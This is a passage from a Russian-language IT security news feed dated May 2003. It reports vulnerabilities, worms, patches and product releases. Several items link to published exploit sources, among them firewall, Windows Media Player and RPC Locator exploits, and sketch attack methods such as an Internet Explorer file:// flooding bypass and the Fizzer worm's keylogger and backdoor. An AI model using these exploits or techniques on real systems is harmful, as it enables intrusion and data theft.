Marc Schoenefeld cообщает об уязвимости, обнаруженной им в Джава-компоненте java.util.zip.* из состава JVM 1.4.1_01. При помощи специально сконструированного Java-апплета можно вызвать DoS броузера при попытке обработать этот самый апплет. JVM этой версии идёт вместе с версией Opera 7.11j. После переписки с командой разработчиков было принято решение включать в состав Opera JVM версии 1.4.1_02, не содержащей уязвимости в компоненте java.util.zip. Версия JVM 1.3.1 также уязвима к этому багу. В приведённой ниже ссылке приводится код, приводящий к DoS. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0115.html
14/05/2003 09:48 Ошибка в Itanium 2 приводит к аварии сервера.
Корпорация Intel сообщила о проблеме с электрикой, возникающей в некоторых серверных процессорах Itanium 2, которая может приводить к аварии корпоративных систем. Как заявляют представители компании, проблема возникает лишь при определенных условиях, включающих отдельные типы данных и команд. Дефект был обнаружен как в 900-мегагерцовых, так и в 1-гигагерцовых моделях при тестовых лабораторных испытаниях и может приводить к непредсказуемым действиям и отключению систем. Intel согласен заменить эти чипы клиентам либо предлагает последним использовать ПО, замедляющее тактовую частоту на Itanium 2 до 800 МГц. Пользователи также могут заменить любой дефектный чип 1,5 ГГц версией, известной как Madison, которая должна выйти в середине 2003 года и не будет иметь подобную проблему. Представители компании пока не могут дать точного ответа, сколько единиц продукции страдают от этой ошибки и во сколько самой компании обойдется замена процессоров на работоспособные. Источник - http://www.cnews.ru
13/05/2003 16:40 Четверг - день спама.
Самое большое количество спама обрушивается в почтовые ящики по четвергам. Это выяснилось в ходе исследования, проведённого в апреле британским интернет-провайдером BT Openworld. Из 25 миллионов писем, проверяемых еженедельно системой Brightmail, 11 млн. оказываются спамом, и 4 млн. из них приходят к своим адресатам в четверг. В воскресенье тоже отмечается всплеск спамерской активности, в этот день уровень нежелательной почты достигает 51%. По данным BT Openworld, спам составляет более 40% почтового трафика. Сравнение с результатами мартовского исследования показало прирост спама на 4,5%. Если же сравнить с апрелем 2002 г., то в этом году пользователи получили на 61% больше нежелательной корреспонденции. В списке лидеров спамерской почты - знакомые предложения сэкономить на телефонных звонках, приобрести картриджи для струйных принтеров, получить кредит на выгодных условиях, полюбоваться на фривольные картинки и поучаствовать в различного рода мошенничествах (вроде нигерийских афёр). Разумеется, участие в них сведётся к исполнению роли жертвы, но, похоже, знают об этом не все. Количество и регулярность рассылки нигерийских (а с недавних пор, и иракских) писем наводит на мысль, что этот бизнес всё ещё выгоден. Источник - http://www.compulenta.ru
13/05/2003 15:52 Вышел номер журнала «Системный администратор» за апрель 2003 г.
Объявлено о выходе апрельского номера журнала "Системный администратор". Содержание: Настройка популярных серверов протокола RADIUS, Создаем VPN на основе VTUN, Система криптографической защиты информации, Инструмент администрирования LIDS: защита компьютера под управлением Linux, Борьба за системные ресурсы, Система фильтрации интернет-трафика, Разводной мост на Linux(Bridging Firewalls), Компиляция FreeBSD. Подробности - http://www.samag.ru/
13/05/2003 13:44 Взлом сайта непризнанного гения стал причиной убийства.
Житель Кливленда совершил вооруженный захват людей в кампусе университета Case Western Reserve. По утверждению террориста, столь радикальный поступок был продиктован местью хакеру, который разрушил его веб-сайт. Инцидент завершился трагедией. В припадке ярости Бисванат Халдер открыл беспорядочный огонь. Был убит 30-летний аспирант Норман Уолесс и ранены два человека. Халдер удерживал заложников в здании кампуса бизнес-школы в течение 7 часов. В результате полицейским пришлось начать перестрелку. Новоявленного террориста удалось ранить навылет и арестовать. Злость Халдера была направлена на сотрудника университета, ассистента школьной компьютерной лаборатории Шона Миллера, который якобы взломал его сайт и тем самым разрушил ему жизнь. Вначале Халдер подавал иски против Миллера в гражданские суды, а также многочисленные жалобы президенту вуза, полиции кампуса, мэру Кливленда, ФБР и даже в судебные комитеты Палаты представителей и Сената США. Однако его требования справедливости были проигнорированы в каждом из названных мест. «Конечный результат всех этих явных злонамеренных действий в том, что общество заплатит за них определенную цену», - предупреждал Халдер в одном из своих публичных заявлений. Подробнее - http://www.runet.ru/news/2994.html
13/05/2003 13:20 Очередные заплатки от Microsoft.
Microsoft продолжает выпускать исправления для своих операционных систем. Новая заплатка ( Microsoft Knowledge Base Article - 812415) предназначена для ошибки, возникающей на компьютерах с ОС Windows 2000 или XP и несколькими жесткими дисками стандарта ATA. Ошибка возникает при выходе из спящего режима и может приводить к различным неприятным ситуациям. В некоторых случаях при "пробуждении" компьютера появляется окно Unsafe Removal of Device, обычно использующееся при работе со сменными носителями информации, в частности, флэш-картами. В других случаях компьютер совсем перестает видеть некоторые диски или вообще зависает. Причиной ошибки является неправильная работа драйвера контроллеров ATA из комплекта Windows. Подробности - http://support.microsoft.com/?kbid=812415
13/05/2003 12:17 Новая версия дистрибутива ASPLinux.
Компания ASPLinux объявила о выходе ASPLinux 9 "Ural". Как сообщается в пресс-релизе компании, новый дистрибутив существенно отличается от ASPLinux 7.x. Основные усилия в разработке ASPLinux 9 прилагались с целью упростить использование дистрибутива, сохранив достаточную надёжность и стабильность. В продажу новый дистрибутив выпускается в виде трех коробочных вариантов: ASPLinux 9 Deluxe Edition, ASPLinux 9 Standard Edition и ASPLinux 9 Express Edition. В коробочные версии входят существенно дополненные и переработанные руководства по установке, работе в системе и администрированию ASPLinux. На отдельных дисках содержатся демонстрационные версии коммерческого программного обеспечения для Linux и игры, а также дополнительная документация и исходные тексты дистрибутива. Кроме того, ASPLinux 9 можно скачать с FTP-сервера компании. Дистрибутив основан на последнем стабильном ядре 2.4.20. ASPLinux 9 включает новейшие версии основных пакетов и совместим с дистрибутивом RedHat 9. Это означает, что все приложения, предназначенные для Red Hat 9, будут работать также и под управлением ASPLinux 9. В ASPLinux 9 упрощен процесс настройки периферийных устройств, расширен список поддерживаемого оборудования, файловых систем, включено большое количество программного обеспечения. Для настройки интернет-соединения, принтера, графической подсистемы и других служб в дистрибутиве есть графические утилиты. Дистрибутив содержит большой набор приложений, необходимых для офисной и домашней работы на компьютере. Прежде всего, это офисные пакеты OpenOffice.org и Sun StarOffice 6.0 (последний - только в коробочной версии), графические редакторы, мультимедийные и интернет-приложения, набор обучающих программ, планировщики личного времени, приложение для проведения видеоконференций и другие полезные утилиты. Источник - http://www.asplinux.ru
13/05/2003 11:04 Новый процессор IBM серии PowerPC G3.
Издание The Register сообщает о планах корпорации IBM по выпуску нового микропроцессора семейства PowerPC G3. По имеющимся данным, новый чип с индексом PowerPC 750GX будет работать на частотах от 1 ГГц и выше. Впрочем, официальной информации о новом процессоре пока немного. Единственным подтверждением существования нового процессора является технический документ IBM, в котором 750GX лишь упоминается без указания каких-либо характеристик чипа. Ранее информация о процессоре (также без подробностей) появлялась на сайтах, публикующих неофициальную информацию о компьютерах Macintosh - именно в них используются процессоры PowerPC, выпускающиеся, впрочем, не IBM, а Motorola. Ранее в планах IBM был выпуск ускоренных версий процессора PowerPC 750FX с частотами от 600 МГц до 1 ГГц. Гигагерцевая версия чипа должна была появиться в конце 2002 г., однако этого не произошло. По-видимому, вместо 750FX с частотой 1 ГГц IBM и планирует выпустить новый чип. По собственной информации The Register, процессор PowerPC 750GX будет работать на частотах от 1 ГГц и выше, а появление его на рынке произойдет не ранее лета этого года. Главным отличием 750FX от 750GX станет более тонкий технологический процесс. Если чипы 750FX выпускались по 0,13-микронной технологии, то в случае 750GX будет использоваться, скорее всего, 0,1-микронная технология. Подробности - http://www.theregister.co.uk/content/3/30640.html
13/05/2003 10:55 За 24 часа Fizzer поразил 17, 765 компьютеров.
Новый компьютерный червь Fizzer (мы сообщали о его появлении вчера), который распространяется не только через электронную почту, но и посредством пиринговых сетей уже поразил десятки тысяч компьютеров в странах Азии, Европы и в США. Бизнесмены азиатских стран первыми забили тревогу о появлении нового вируса,. cообщает Reuters. К полудню того же дня вирус уже добрался до европейских пользователей поразив десятки тысяч компьютерных систем. В Северной Америке вирус еще не успел получить широкое распространение, поскольку его проникновение в регион пришлось на конец рабочего дня. Британская анти- вирусная компания MessageLabs зарегистрировала в течении 24 часов 17, 765 случаев заражения вирусом Fizzer. «Быстрые темпы распространения червя заставляют нас отнести его к группе вирусов, предстовляющих высоких риск для обычных пользователей, - рассказал в интервью Reuters Макр Тошак, один из аналитиков MessageLabs. Исчтоник - http://www.internet.ru
13/05/2003 10:25 Обзор вирусной активности за апрель.
"Лаборатория Касперского" подвела итоги вирусной активности за апрель 2003 г. Первые 3 места принадлежат червям: Klez - 20.11%, Lentin - 17.91%, Ganda - 0.76%. На четвёртом месте - троянец Trojan.PSW.M2 - 0.69%, на пятом - знаменитый Win95.CIH - 0.67%. Подробнее - http://www.kaspersky.ru/news.html?id=1234683
12/05/2003 16:07 Локальная уязвимость в Firebird.
Сообщается об уязвимости в Firebird ОС Linux и FreeBSD. Firebird является высокопроизводительной СУБД, поддерживающей ANSI SQL-92 запросы. При формировании очень длинного значения перменной среды INTERBASE возможно переполнение стека в буфере. Проблема связана с некорректной обработкой границ при вызове функции getenv() в файлах gds_inet_server, gds_drop, gds_lock_mgr. Кроме того, так как эти файлы установлены с битом SUID root - возникает возможность локального получения прав суперпользователя, а также повреждения базы данных и установки троянского ПО. Уязвимы версии до 1.0.2 включительно. Выпущены эксплоиты для версий 1.0.1, 1.0.2 для ОС Linux и Free BSD. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0112.html
12/05/2003 15:38 Очередная уязвимость в Internet Explorer.
Marek Bialoglowy из System Integra, Индонезия, опубликовал обнаруженную им уязвимость В Internet Explorer (проверялась версия 6.0.2800). Автор исследовал троян на VBS, написанный неким netric, при заражении которым создавалось большое количество фреймов IE и осуществлялось множество подключений telnet://www.microsoft.com:80. AVP определяет этого трояна, как Trojan.VBS.IFram. Модифицировав этот троян и создав собственную версию под названием dmz2.html, автор утверждает, что при его помощи можно взломать большое количество машин в локальной сети. Было замечено, что существует возможность обхода модели безопасности IE, зафлуживая подлежащую инфицированию машину множеством запросов вида file://. При этом возникает возможность выполнения ЛЮБОГО файла при обходе механизма защиты IE. Запрашиваемый файл был - trojan.exe, помещённый на соседнем Win2K-сервере. На IE6.0 результат был одинаковый - после приблизительно 200 диалоговых окон с запросом файла 'trojan.exe' происходил его запуск. В тестах использовались машины с ОС WinXP и Win2K с версиями IE 6.0.2800.1106. В результате открытия сетевого расшаренного ресурса с файлом 'dmz1.html' выполнялся в итоге код трояна - 'trojan.exe'. Зона безопасности была выставлена в "MEDIUM". Как пишет далее Марек, IE5 не подвержен уязвимости, также сообщается о неподверженности уязвимости IE 6.0.2600. В качестве временной меры защиты (до выпуска Microsoft официальных патчей) рекомендуется выставлять зону безопасности IE в HIGH, а также использовать антивирусное ПО. В письме BUGTRAQ был приаттачен архив с эксплоитом. Более подробно - http://archives.neohapsis.com/archives/bugtraq/2003-05/0101.html
12/05/2003 15:02 Cтатья "Построение sendmail c использованием SSL и IMAP с SSL в RedHat Linux 7.x/8.0".
На сайте Open Source Digest опубликована статья из серии HOWTO под названием "Authenticated Sendmail over SSL and IMAP over SSL on RedHat Linux 7.x/8.0 Systems", автор которой - Marion Bates. Как следует из названия, статья посвящена описанию процесса установки и конфигурирования MTA Sendmail с поддержкой механизма SMTP-AUTH, реализуемого OpenSSL. Если же необходимо иметь механизм аутентицикации, реализованный на MD5, необходима установка пакета cyrus SASL, процесс инсталляции которого также описан в статье. В конце описан процесс прикручивания SSL к протоколу IMAP. Настоятельно рекомендуется СИСАДМИНам, настраивающим почтовую систему для пользователей, имеющих динамические IP-адреса. Статья - http://www.opensourcedigest.org/issue2/sendmail-auth-howto.html
12/05/2003 14:38 Россия начинает борьбу с компьютерными вирусами.
Из-за того что вирусные эпидемии и атаки все чаще становятся причиной нарушения нормального функционирования российского Интернета, государство начинает полномасштабную войну против разработчиков вредоносных программ ... На этой неделе в Москве Ассоциация документальной электросвязи (АДЭ), куда входят крупные российские компании-провайдеры, проведет совещание по подготовке «Меморандума о противодействии распространению вредоносных программ». Ранее Минсвязи и ряд российских компаний создали рабочую группу для подготовки предложений по мерам защиты российского Интернета и информационных систем от компьютерных вирусов. Решение об этом было принято на прошедшем перед праздниками под председательством министра связи РФ Леонида Реймана заседании, где обсуждали меры защиты российского сегмента сети Интернет и информационных систем от компьютерных вирусов и других опасностей, связанных с атаками и несанкционированным использованием компьютерных сетей. Уже этим летом в России может быть разработана государственная программа по борьбе с вирусами. Однако принципиальный вопрос о том, каким будет механизм борьбы с вирусами на государственном уровне, все еще остается открытым. В прошедшем в конце апреля совещании «Безопасность средств связи и снижение угроз вирусных атак» участвовали специалисты Минсвязи России и других государственных и научных учреждений, представители ведущих интернет-операторов и фирм-производителей антивирусных программ. На мероприятии была обозначена проблема угрозы «вредоносных программ», распространяемых через электронную почту. Подробнее - http://www.crime-research.org/news/2003/05/1201.html
12/05/2003 14:05 Windows XP вынесет двоих.
Microsoft планирует модернизировать свою операционную систему Windows ХР таким образом, чтобы два пользователя могли одновременно работать с разными приложениями на одной и той же машине. Это важно для решения задачи компании по превращению ПК в домашний центр развлечений. Пакет Service Pack 2 для операционной системы Windows XP позволит одному пользователю манипулировать приложениями с клавиатуры, пока другой смотрит фильмы или путешествует по интернету на том же компьютере посредством интеллектуального дисплея. Разработанный Microsoft интеллектуальный дисплей с кодовым названием Mira представляет собой автономный 10- или 15-дюймовый монитор с операционной системой Microsoft Windows CE for Smart Displays. В нем нет жестких дисков, и он не поддерживает прямой связи с интернетом, зато посылает запросы и получает данные от базового ПК под Windows ХР, с которым поддерживает связь по беспроводной сети 802.11 для доступа к e-mail, веб-браузинга или чтения документов. Для ввода данных вместо клавиатуры используется стилус. Отсутствие поддержки одновременной работы было одной из главных претензий к интеллектуальным дисплеям. Теперь эти устройства станут более комфортными для потребителей. С момента их появления на рынке в январе интеллектуальные дисплеи пользуются относительно низким спросом. «Мы осознали, насколько выгодна для потребителей возможность одновременно обращаться к контенту на головном ПК как через сам компьютер, так и через интеллектуальный дисплей, – говорит продакт-менеджер отделения Windows Powered Smart Displays Microsoft Меган Кидд. – Мы работаем над решением этой проблемы». Подробнее - http://www.zdnet.ru/?ID=300447
12/05/2003 13:28 Очередная статья рубрики "Экслер по пятницам".
На сайте runet.ru опубликована очередная статья рубрики "Экслер по пятницам". В ней Алекс делится своими размышлениями по по поводу обнаруженных на прошлой неделе уязвимостях в популярном мессенджере ICQ, выпускаемом и поддерживаемом израильской фирмой Mirabillis. Cама статья называется "Дырявая "Аська" - мифы и реальность". Собственно, вся статья сводится к тому, что вся "дырявость" Аськи является более надуманной проблемой, чем реально существующей. Статья - http://www.runet.ru/analitika/2984.html
12/05/2003 12:04 Эксплоит уязвимости в PersonalFTPD.
Subj из российской группы DWC написал на Перле эксплоит уязвимости, обнаруженной ранее в FTP-сервере для Win-ОС PersonalFTPD. Использование уязвимости приводит к удалённому переполнению буфера в стеке сервера. Эксплоит - http://www.dwcgr0up.com
12/05/2003 11:29 Fizzer: многовекторный червь нападает через e-mail и KaZaA.
"Лаборатория Касперского" сообщает об обнаружении нового интернет-червя "Fizzer". Помимо рассылки по электронной почте, данная вредоносная программа содержит процедуры рассылки через P2P-сеть KaZaA, клавиатурного "жучка" и троянца для удаленного управления зараженным компьютером. На данный момент "Лаборатория Касперского" уже получила сообщения об инцидентах, связанных со случаями заражения "Fizzer". "Fizzer" является классическим сетевым червем, распространяющимся по ресурсам интернета. Эта вредоносная программа доставляется на целевой компьютер в виде исполняемого файла и активизируется при его запуске. После этого на диске создаются 5 дополнительных файлов и модифицируется секция автозапуска программ системного реестра Windows для загрузки "Fizzer" при старте операционной системы. Отличительной, но отнюдь не уникальной чертой этого червя является многовекторность: он одинаково эффективно распространяется по электронной почте и через файлообменную сеть KaZaA. Для рассылки по e-mail "Fizzer" сканирует адресные книги Outlook и Windows (Windows Address Book) или использует в качестве объекта атаки случайные адреса в крупнейших публичных почтовых системах, таких как hotmail.com и yahoo.com. После этого червь от имени владельца компьютера незаметно рассылает зараженные сообщения, которые могут иметь различные темы, тексты и имена вложенных файлов. Например: Тема: Re: I think you might find this amusing... Вложенный файл: Logan6.exe Текст: Let me know what you think of this... Для распространения по KaZaA "Fizzer" создает свои копии со случайными именами в директории этой файлообменной сети, так что они становятся доступными для других ее участников. "Fizzer" имеет ряд опасных побочных эффектов, которые могут спровоцировать утечку конфиденциальной информации с зараженного компьютера. Червь устанавливает клавиатурного "жучка", который перехватывает и записывает в отдельный файл все нажатия клавиш. Для передачи этих и других данных в систему внедряется backdoor-утилита (утилита несанкционированного удаленного управления), которая позволяет злоумышленникам незаметно контролировать компьютер через чат-каналы IRC и по протоколам HTTP и Telnet. Кроме того, червь регулярно соединяется с web-страницей на общедоступном сервере Geocities и пытается загрузить обновленную версию своих исполняемых модулей. Наконец, для предотвращения обнаружения, "Fizzer" сканирует память компьютера и закрывает активные процессы ряда наиболее популярных антивирусных программ. Источник - http://www.kaspersky.ru
12/05/2003 10:33 Вирус "Saynob" по первым числам объясняется в любви.
Обнаружен очень опасный резидентный Win32-вирус "Saynob". Он рекурсивно ищет и заражает приложения Win32 (PE EXE-файлы) на локальных дисках и всех доступных сетевых ресурсах. При заражении записывается в конец файла. По первым числам ежемесячно удаляет на всех дисках все файлы и выводит сообщение: "My Baby Do you Love me? Do not Say No!". Источник - http://www.viruslist.ru
12/05/2003 09:25 Патч для персоннал файрволлов.
Descript из французской команды Skin Of Humanity выпустил патч, устраняющий уязвимости в Kerio Personal Firewall и Tiny Personal Firewall. Уязвимость была обнаружена ранее CoreSecurity и связана с возможностью переполнения буфера в общем для обоих файрволлов движке PFEngine. Примечательно, что эксплоит тоже был выпущен Descript. Заплатка патчит 2.1.4.0 Kerio и 2.0.15.0 Tiny. Патч - http://www.s0h.cc/~threat/goodies/PFpatch/sources_PFpatch.zip
12/05/2003 09:07 Эксплоит уязвимости в RPC locator.
На сайте ЗАРАЗы (security.nnov.ru) выложен эксплоит уязвимости в сервисе RPC Locator Win-ОС. Выпущен NTeam. Эксплоит - http://www.security.nnov.ru/files/RPClocat.zip
11/05/2003 20:39 Фильтрация спама при помощи Spamassassin.
На opennet.ru появилась ссылка на статью, описывающую технологию настройку спам-фильтра Spamassasin. В статье подробно описывается процесс установки Spamassassin для блокирования спама (блокирование по глобальным (DNSBL) и локальным блэклистам, маскам в теле письма и заголовке, эвристическое определение спама). Cтатья - http://www.opensourcedigest.org/issue2/spamassassin.html
11/05/2003 16:27 Вышла Mozilla 1.3.1.
Вышел очередной релиз браузера Mozilla - 1.3.1. Добавлены фильтры для ньюсгрупп, динамическое переключение пользовательских профилей, автоматическое масштабирование изображений под размер окна, добавлена панель настроек быстрого поиска по странице. Включены исправления, касающиеся производительности и совместимости со стандартами. Новая заставка при запуске. Подробности - http://mozilla.org/releases/mozilla1.3.1/
11/05/2003 15:50 Неизвестный хакер взломал www.xakep.ru.
9 мая на сайте www.xakep.ru около двух часов висел дефейс - вслывающее окошко с надписью "defaced by Arvi the Hacker, ребята, с праздником вас!". После появление этой надписи проиходил редирект на сайт Гражданской Школы Хэкеров - http://hscool.net. Как удалось выяснить, сайт www.xakep.ru поддерживается двумя серверами. Один находится в редакции и отвечает за динамическую часть (к нему можно обратиться по адресу www1.xakep.ru), второй, откликающийся по адресу www.xakep.ru - есть зеркало первого, находящееся у провайдера и обновляемое с некоторой частотой. Кроме того, с сервера www1.xakep.ru в режиме реального времени (через iframe) берутся все динамические данные, в том числе баннер, висящий сверху сайта. Был взломан именно редакционный сервер, конкретнее - хакер получил доступ к базе данных и изменил ее так, что вместо баннеров стал отображаться скрипт дефейса и редирект. Подробнее - http://www.securitylab.ru/?ID=37744
11/05/2003 14:41 Введение в DHCP.
Вот - благодаря господину Rend с подфорума RTFM форума sysadmins.ru нашёл некое пособие по DHCP на аглицком языке. Возможно - кому-нить будет интересно. Но на самом деле ваш покорный слуга настроил ДХЦП за 5 минут. На всякий случай-ссылка. Ссылка - http://www.onlamp.com/pub/a/bsd/2003/04/17/FreeBSD_Basics.html
11/05/2003 13:36 Выход SuSE Linux 8.2.
SuSE Linux 8.2 выложен на свободное скачивание с зеркал. Хотя SuSE и не предоставляет обычных установочных ISO для скачивания, каталог с 8.2 был загружен для того, чтобы можно было установить SuSE Professional Edition напрямую с FTP-серверов. Новость получена из списка рассылки *nixp. Подробнее - http://gd.tuwien.ac.at/linux/suse/suse.com/i386/8.2/README.FTP)
11/05/2003 12:32 Эксплоит уязвимости в Windows Media Player.
Господин jelmer очень долго рассказывал о том, как его x4all в Голландии поимели, оставив его без доступа в Интернет. Итогом этой обиды стал исходник эксплоита, позволяющего использовать уязвимость в WMP, о которой мы писали ранее. Написан на Джаве. Эксплоит - http://archives.neohapsis.com/archives/bugtraq/2003-05/att-0092/MediaPlayerExploit.java
11/05/2003 11:28 Ещё об уязвимости в .Net Passport .
Дабы поставить точку в уязвимостях системы .Net Passport - приводим ссылку на документ, выпущенный господами Qazi Ahmed & Shoaib Rehman из Пакистана. Они описывают уязвимость аж в двух компонентах системы авторизации .Net Passport. Первая из них связана с возможностью обхода секретной фразы, при помощи которой можно приобрести доступ к системе, вторая - с возможностью обнуления пароля через Вэб-интерфейс. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0089.html
10/05/2003 15:27 Эксплоит для персоннал файрволлов.
Опубликован эксплоит персоннал файрволлов Tiny Personal Firewall 2.0.15 и Kerio Personal Firewall 2.1.4, об уязвимости в которых сообщалось ранее CORE Security Technologies. Написан для операционной системы Windows. Автор - некто ThreaT. Исходник - http://packetstorm.linuxsecurity.com/0305-exploits/PFExploit.c
10/05/2003 14:16 Ещё про уязвимость в Hotmail & Passport (.NET Accounts).
Некоторые подробности об уязвимости в Hotmail & Passport (.NET Accounts) сообщил Muhammad Faisal Rauf Danka из www.attitudex.com (мы писали об этом в предыдущих статьях. Так вот, оказывается, что некий attacker@attacker.com в Интернет для получения доступа к данным системы Passport предлагает всего лишь кликнуть на ссылке (URL) сайта register.passport.net - после этого пароль будет снят. Как пишет сам автор - он писал об этом неоднократно Hotmail, однако получал ответы от почтовых ботов. Более подробно - http://packetstorm.linuxsecurity.com/0305-exploits/hotmailpassport.txt
10/05/2003 13:08 Алекс Экслер о ФСБ и электронной почте.
На сайте runet.ru опбуликована статья под заголовком "Экслер по пятницам: Большой брат дремать не обещал". Собственно, посвящена она взгляду автора на появившиеся недавно в электронных СМИ слухам о том, что ФСБ решила установить контроль за почтовыми ящиками пользователей, зарегистрировавших их на общедоступных серверах: mail.ru, rambler.ru. Почитайте - возможно, кому-то это будет интересно. Вывод, который вытекает из статьи: "Изучайте PGP (мощный и очень распространенный механизм шифрования), ребята. PGP - штука не сложная, но довольно эффективная. Пользуйтесь почтовыми клиентами, которые позволяют полностью автоматизировать процесс шифрования корреспонденции. Они, конечно, это дело расшифруют, если сильно понадобится, но хоть не сразу". Статья - http://www.runet.ru/analitika/2953.html
10/05/2003 12:24 Microsoft признала прокол.
Компания Microsoft признала, что компьютерные взломщики могли с легкостью овладеть конфиденциальной информацией о миллионах пользователей онлайновой идентификационной службы Passport. По всей видимости, хакеры обнаружили брешь в системе защиты только месяц назад. Microsoft заявляет, что она заблокировала все взломанные счета и полностью устранила проблему. Установил причину уязвимости системы пакистанский компьютерщик, который сам однажды стал жертвой взломщиков. Passport тесно связан с Windows XP, Hotmail и другими продуктами Microsoft. Некоторые онлайновые коммерческие службы используют Passport для идентификации своих клиентов, которые пользуются персональными эккаунтами для покупки товаров или услуг в онлайновом режиме. Преступники, которые использовали недоработку Microsoft, могли получить доступ к информации о покупателях, их почтовым ящикам и номерам их кредитных карточек. В чем состояла ошибка Microsoft, понял Мухаммад Фейзал Данка, независимый эксперт по компьютерной безопасности. Пытаясь найти ответ на вопрос о том, как были взломаны его собственный эккаунт и эккаунты его друзей, Данка обнаружил сайт, предоставлявший привилегированный доступ к личным эккаунтам и позволяющий менять пароль. "Это было так просто сделать. Это не должно было быть так просто. Это мог сделать каждый", - заявил Данка. Он послал десять безответных писем в адрес Microsoft, однако компания отреагировала только тогда, когда эта информация была опубликована в сети. Сайт, делавший уязвимыми для взломщиков 200 миллионов личных эккаунтов системы, был закрыт. Подробнее - http://news.bbc.co.uk/hi/russian/business...
10/05/2003 11:58 Веб-браузеру исполнилось 10 лет.
Несколько запоздавшая новость, но всё же... Десять лет назад, в апреле 1993 года, разработчики программного обеспечения из Университета Иллинойса (University of Illinois) выпустили веб-браузер Mosaic. Благодаря удобному графическому дизайну и простоте «Мозаика» ресурсы глобальной информационной Сети стали доступными массовому пользователю. То, что когда-то было сферой, понятной лишь ученым и компьютерным фанатикам, упростилось до понимания практически любого человека. Бесплатный Mosaic стал впоследствии платформой для создания современных Internet Explorer и Netscape Communicator. Ведущий разработчик первого браузера, Марк Андрессен (Marc Andreessen), стал одним из основателей компании Netscape, в которую привел и других своих сослуживцев. «Это событие было свого рода толчком для развития всего интернета, — заявил корреспонденту Associated Press Лари Смарр (Larry Smarr), в прошлом директор компьютерного центра при университете. — Тогда Сеть перешла на следующий уровень развития». В «домозаиковый» период всякий интернет-пользователь был ограничен текстовой информацией, однако новый софт подарил всем изображение и звук. Первый Mosaic работал только под Unix, версии для Windows и Macintosh вышли в том же году. Андрессен и его коллега Эрик Бина (Eric Bina) достигли своей цели — они придумали и запустили в работу браузер, работающий с разными операционными системами, который прост в установке и использовании. Они совершили настоящую революцию в информационных технологиях. За 1993 год Mosaic скачали с университетского сайта 1 млн раз — по 70 000 копий в месяц. Подробнее - http://www.webplanet.ru/news/software/2003/4/28/mosaic.html
10/05/2003 11:23 Longhorn выйдет в 2005 году.
Longhorn, следующая столбовая версия Windows для настольных ПК, дебютирует в 2005 году и поднимет графику ПК на новый уровень, заявили в среду руководители Microsoft. В 2004 году Microsoft планирует выпустить еще «пару бета-версий» Longhorn, но финальная версия операционной системы будет готова не раньше 2005 года, сказал старший вице-президент отделения Microsoft Windows Client Уилл Пул, выступив на конференции Windows Hardware Engineering Conference (WinHEC) в Новом Орлеане. «Компания бросила на Longhorn все свои силы, — сказал он. — На карту поставлено очень многое. Эта система изменит картину мира», — сказал он. В Longhorn Microsoft надеется улучшить качество визуальной работы с компьютером. Представители компании продемонстрировали предварительную бета-версию Longhorn и сказали, что цель разработки заключается в том, чтобы ОС могла работать на экранах с оптическим разрешением в 120 точек на дюйм и выше. Это гораздо более высокое качество, чем у современных дисплеев. 17-дюймовый дисплей SXGA имеет разрешение примерно 95 точек на дюйм, отмечает аналитик IDC Боб Одоннелл. При повышении разрешения изображения существующие мониторы сжимают его — в этом можно убедиться, установив максимальное разрешение на панели управления компьютера. Текст становится слишком мелким, и его почти невозможно прочесть. При повышении общего разрешения пользователям не придется переходить на предельные значения разрешения монитора. «Если все становится мельче, то выше не означает лучше», — говорит Одоннелл. Подробнее - http://www.zdnet.ru/?ID=300430
10/05/2003 10:32 Сотрудники Ericsson обвиняются в шпионаже.
Три сотрудника компании LM Ericsson, граждане Швеции, обвиняются в шпионаже в пользу России. Суд над ними начнётся на следующей неделе в Швеции. Главным подозреваемым является 46-летний Афшин Баванд. По сообщению информационного агентства AP, в ноябре он был пойман с поличным в момент передачи секретных сведений агенту российских спецслужб. Поздее были задержаны два его сослуживца. Баванд обвиняется в шпионаже, в том числе промышленном. Если суд признает его вину, он может провести остаток жизни в тюрьме. Помощники Баванда подозреваются в соучастии в промышленном шпионаже. Им грозит до пяти лет тюремного заключения. Хотя LM Ericsson выполняет военные заказы, в данном случае речь идёт не о них. Во всяком случае, так утверждают представители Ericsson. Переданные Бавандом документы касались коммерческих систем связи. Ожидается, что суд примет решение по этому делу в июне. Источник - http://www.compulenta.ru
10/05/2003 09:50 Антивирус Касперского встроили в систему мониторинга электронной почты Policy Patrol.
"Лаборатория Касперского" и американская компания Red Earth Software, специализирующаяся на создании программного обеспечения для обработки электронной корреспонденции, объявляют о заключении партнерского соглашения. Антивирусный сканер "Лаборатории Касперского" интегрирован в систему мониторинга электронной корреспонденции Policy Patrol. Policy Patrol - это система мониторинга электронной корреспонденции для почтовых шлюзов Microsoft Exchange Server и Lotus Domino. Среди прочего, программа служит для выявления спама, фильтрации почты по ключевым словам, проверки вложенных файлов, управления содержанием электронных писем. Теперь функциональность Policy Patrol существенно расширена благодаря интеграции с Антивирусом Касперского. Благодаря этому пользователи Policy Patrol имеют возможность проверять всю входящую и исходящую электронную почту для выявления и нейтрализации вирусов, сетевых червей и "троянцев". Антивирус Касперского сканирует вложенные файлы (в том числе архивированные и сжатые), внедренные OLE-объекты и, собственно, тело письма. Источник - http://www.kaspersky.ru
10/05/2003 09:46 Microsoft борется со спамом
В интернет-провайдере MSN, принадлежащем Microsoft, считают, что спам из простого неудобства превратился в значительную проблему. "Он затрудняет людям разбор собственной почты и уменьшает их продуктивность", - заявила менеджер MSN Лиза Гарри. Компания прилагает усилия для борьбы со спамом. Пользователям веб-почты Hotmail, которая входит в состав портала MSN, уже доступно несколько антиспамных средств. Теперь к ним добавилось ещё одно. Каждый день спам рассылается по миллиардам адресов, и большинство писем, конечно, никогда и никуда не доходит. Чтобы узнать, какие из адресов электронной почты в их базах данных всё ещё действуют, спаммеры часто используют "жучки" - крохотные невидимые картинки, встроенные в код HTML-писем. Если письмо когда-нибудь откроют, на сервер спамера придёт запрос на получение картинки, и спамер убедится, что данный адрес существует. После этого обладателю засвеченного адреса остаётся только ожидать ещё большие потоки спама. Новое средство, введённое MSN, служит именно для борьбы со спамерскими "жучками". Теперь картинки в письме будут загружаться только в том случае, если письмо послано кем-то из знакомых пользователя. Если же отправителя нет в контакт-листе, картинки придётся загрузить вручную. Пользователей Hotmail защищают от спама несколько фильтров. Первый из них отбрасывает письма, отправленные с адресов, которые есть в "чёрном" списке Probe Network. Второй фильтр сортирует почту в соответствии с "белым" списком, который может составить сам пользователь. Наконец, третий фильтр использует разработанные в Microsoft Research алгоритмы машинного обучения, чтобы отличать подозрительные рекламные письма. Чтобы 